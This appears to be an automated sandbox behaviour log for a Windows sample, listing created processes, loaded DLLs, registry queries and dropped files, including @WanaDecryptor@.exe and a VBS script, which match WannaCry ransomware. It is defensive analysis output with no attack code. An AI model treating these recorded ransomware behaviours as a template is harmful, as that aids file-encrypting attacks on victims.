Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll

Source: C:\Windows\SysWOW64\cscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: LisectAVT_2403002A_126.EXE.exe

Static file information: File size 3514376 > 1048576

Source: LisectAVT_2403002A_126.EXE.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000

Source:	Binary string: ntkrnlmp.pdb source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.2608335757.0000000000B12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: NGLCLI~2.LOGntkrnlmp.pdbrx source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.2608335757.0000000000B12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb23.6.20320.6 2023-10-05 10-15-18-157.logT source: LisectAVT_2403002A_126.EXE.exe, 00000000.00000003.2608335757.0000000000B12000.00000004.00000020.00020000.00000000.sdmp

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\m.vbs

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

File created: C:\Users\user\Documents\@WanaDecryptor@.exe

Jump to dropped file

Uses cmd line tools excessively to alter registry or file data

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	Process created: attrib.exe	Jump to behavior

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
